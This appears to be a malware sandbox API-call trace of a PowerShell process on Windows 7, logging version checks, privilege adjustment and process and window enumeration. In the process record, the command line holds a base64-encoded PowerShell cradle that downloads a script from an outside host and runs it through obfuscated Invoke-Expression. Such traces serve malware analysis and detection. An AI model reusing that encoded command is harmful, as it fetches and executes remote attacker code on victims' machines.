	[0962.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.373] CoCreateGuid (in: pguid=0x16de30 | out: pguid=0x16de30*(Data1=0xe004f854, Data2=0xfbe4, Data3=0x40e3, Data4=([0]=0xae, [1]=0x70, [2]=0x53, [3]=0x35, [4]=0x2, [5]=0xa, [6]=0x4c, [7]=0xcd))) returned 0x0
	[0964.122] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0964.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.122] CoTaskMemFree (pv=0x339a20) 
	[0966.549] WinSqmIsOptedIn () returned 0x0
	[0966.549] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0966.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.550] CoTaskMemFree (pv=0x339a20) 
	[0966.550] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0966.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.551] CoTaskMemFree (pv=0x339a20) 
	[0967.580] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0967.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.580] CoTaskMemFree (pv=0x339a20) 
	[0967.580] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0967.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.580] CoTaskMemFree (pv=0x339a20) 
	[0967.581] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0967.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.581] CoTaskMemFree (pv=0x339a20) 
	[0968.907] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0968.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.907] CoTaskMemFree (pv=0x339a20) 
	[0968.907] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0968.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.908] CoTaskMemFree (pv=0x339a20) 
	[0968.908] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0968.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.908] CoTaskMemFree (pv=0x339a20) 
	[0968.910] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0968.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.910] CoTaskMemFree (pv=0x339a20) 
	[0970.115] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0970.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.115] CoTaskMemFree (pv=0x339a20) 
	[0970.115] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0970.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.115] CoTaskMemFree (pv=0x339a20) 
	[0970.115] CoTaskMemAlloc (cb=0x104) returned 0x339a20
	[0970.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x339a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.116] CoTaskMemFree (pv=0x339a20) 

Thread:
	id = 558
	os_tid = 0x224


Thread:
	id = 563
	os_tid = 0xc98


Thread:
	id = 1314
	os_tid = 0x1db8


Thread:
	id = 1319
	os_tid = 0x1ddc


Thread:
	id = 1383
	os_tid = 0x1f6c


Thread:
	id = 1496
	os_tid = 0x1ca8


Thread:
	id = 1563
	os_tid = 0x20c8


Thread:
	id = 1564
	os_tid = 0x20cc

	[0784.483] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.129] RegCloseKey (hKey=0x2e8) returned 0x0
	[0893.129] RegCloseKey (hKey=0x2f0) returned 0x0
	[0893.129] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 1798
	os_tid = 0x1d7c


Process:
	id = "103"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x654a7000"
	os_pid = "0x136c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 534
	os_tid = 0x1370

	[0819.873] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0828.438] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0828.440] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0828.440] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0828.440] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0847.878] GetVersionExW (in: lpVersionInformation=0xedea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.881] GetVersionExW (in: lpVersionInformation=0xedea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xedac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xedb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.842] GetVersionExW (in: lpVersionInformation=0xedc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0848.843] SetErrorMode (uMode=0x1) returned 0x1
	[0848.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedd70 | out: lpFileInformation=0xedd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0848.845] SetErrorMode (uMode=0x1) returned 0x1
	[0848.849] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedfe0 | out: lpdwHandle=0xedfe0) returned 0x94c
	[0848.851] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ab72d8 | out: lpData=0x2ab72d8) returned 1
	[0848.854] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedf58, puLen=0xedf50 | out: lplpBuffer=0xedf58*=0x2ab7374, puLen=0xedf50) returned 1
	[0848.856] lstrlenW (lpString="䅁") returned 1
	[0848.866] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab7450, puLen=0xedec0) returned 1
	[0848.867] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0848.869] CoTaskMemAlloc (cb=0x2e) returned 0x3693d0
	[0848.870] lstrcpyW (in: lpString1=0x3693d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0848.871] CoTaskMemFree (pv=0x3693d0) 
	[0848.871] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab74a4, puLen=0xedec0) returned 1
	[0848.871] lstrlenW (lpString="System.Management.Automation") returned 28
	[0848.871] CoTaskMemAlloc (cb=0x3c) returned 0x313930
	[0848.871] lstrcpyW (in: lpString1=0x313930, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0848.871] CoTaskMemFree (pv=0x313930) 
	[0848.871] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab7500, puLen=0xedec0) returned 1
	[0848.871] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.871] CoTaskMemAlloc (cb=0x20) returned 0x36a4c0
	[0848.871] lstrcpyW (in: lpString1=0x36a4c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.871] CoTaskMemFree (pv=0x36a4c0) 
	[0848.871] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab7540, puLen=0xedec0) returned 1
	[0848.871] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.871] CoTaskMemAlloc (cb=0x44) returned 0x313930
	[0848.871] lstrcpyW (in: lpString1=0x313930, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.872] CoTaskMemFree (pv=0x313930) 
	[0848.872] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab75a8, puLen=0xedec0) returned 1
	[0848.872] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0848.872] CoTaskMemAlloc (cb=0x76) returned 0x3046d0
	[0848.872] lstrcpyW (in: lpString1=0x3046d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0848.872] CoTaskMemFree (pv=0x3046d0) 
	[0848.872] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab7644, puLen=0xedec0) returned 1
	[0848.872] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.872] CoTaskMemAlloc (cb=0x44) returned 0x313930
	[0848.872] lstrcpyW (in: lpString1=0x313930, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.872] CoTaskMemFree (pv=0x313930) 
	[0848.872] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab76a8, puLen=0xedec0) returned 1
	[0848.872] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0848.872] CoTaskMemAlloc (cb=0x58) returned 0x2b58a0
	[0848.872] lstrcpyW (in: lpString1=0x2b58a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0848.872] CoTaskMemFree (pv=0x2b58a0) 
	[0848.872] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab7724, puLen=0xedec0) returned 1
	[0848.872] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.873] CoTaskMemAlloc (cb=0x20) returned 0x36a4c0
	[0848.873] lstrcpyW (in: lpString1=0x36a4c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.873] CoTaskMemFree (pv=0x36a4c0) 
	[0848.873] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x2ab73cc, puLen=0xedec0) returned 1
	[0848.873] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0848.873] CoTaskMemAlloc (cb=0x66) returned 0x2cb990
	[0848.873] lstrcpyW (in: lpString1=0x2cb990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0848.873] CoTaskMemFree (pv=0x2cb990) 
	[0848.873] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x0, puLen=0xedec0) returned 0
	[0848.873] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x0, puLen=0xedec0) returned 0
	[0848.873] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedec8, puLen=0xedec0 | out: lplpBuffer=0xedec8*=0x0, puLen=0xedec0) returned 0
	[0848.873] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xede98, puLen=0xede90 | out: lplpBuffer=0xede98*=0x2ab7374, puLen=0xede90) returned 1
	[0848.874] CoTaskMemAlloc (cb=0x204) returned 0x2fc970
	[0848.874] VerLanguageNameW (in: wLang=0x0, szLang=0x2fc970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0849.832] CoTaskMemFree (pv=0x2fc970) 
	[0849.832] VerQueryValueW (in: pBlock=0x2ab72d8, lpSubBlock="\\", lplpBuffer=0xedee8, puLen=0xedee0 | out: lplpBuffer=0xedee8*=0x2ab7300, puLen=0xedee0) returned 1
	[0849.839] GetCurrentProcessId () returned 0x136c
	[0849.856] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xece10 | out: lpLuid=0xece10*(LowPart=0x14, HighPart=0)) returned 1
	[0849.859] GetCurrentProcess () returned 0xffffffffffffffff
	[0849.860] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xece30 | out: TokenHandle=0xece30*=0x2d0) returned 1
	[0849.861] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2abab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0849.863] CloseHandle (hObject=0x2d0) returned 1
	[0849.867] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x136c) returned 0x2d0
	[0851.704] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2ababb8, cb=0x200, lpcbNeeded=0xede48 | out: lphModule=0x2ababb8, lpcbNeeded=0xede48) returned 1
	[0851.707] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2abae28, cb=0x18 | out: lpmodinfo=0x2abae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0851.708] CoTaskMemAlloc (cb=0x804) returned 0x36ba80
	[0851.708] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x36ba80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0851.708] CoTaskMemFree (pv=0x36ba80) 
	[0851.709] CoTaskMemAlloc (cb=0x804) returned 0x36ba80
	[0851.709] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x36ba80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0851.710] CoTaskMemFree (pv=0x36ba80) 
	[0851.711] CloseHandle (hObject=0x2d0) returned 1
	[0851.719] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x136c) returned 0x2d0
	[0851.720] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0xedf78 | out: lpExitCode=0xedf78*=0x103) returned 1
	[0851.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12abb088, Length=0x20000, ResultLength=0xedf40 | out: SystemInformation=0x12abb088, ResultLength=0xedf40*=0x46058) returned 0xc0000004
	[0853.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12adb0b8, Length=0x48858, ResultLength=0xedf40 | out: SystemInformation=0x12adb0b8, ResultLength=0xedf40*=0x46198) returned 0x0
	[0853.515] EnumWindows (lpEnumFunc=0x22966ac, lParam=0x0) returned 1
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x558
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x538
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.143] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x778
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x778
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.144] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1fb0
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e10
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x23a8
	[0855.145] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f24
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x21ec
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2320
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1fd4
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1880
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b18
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1d6c
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x233c
	[0855.146] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2368
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2124
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x22f0
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x22ac
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1cdc
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10f0
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f18
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20a8
	[0855.147] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2004
	[0855.148] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f88
	[0855.148] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f84
	[0855.148] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2050
	[0855.148] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e04
	[0855.148] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ecc
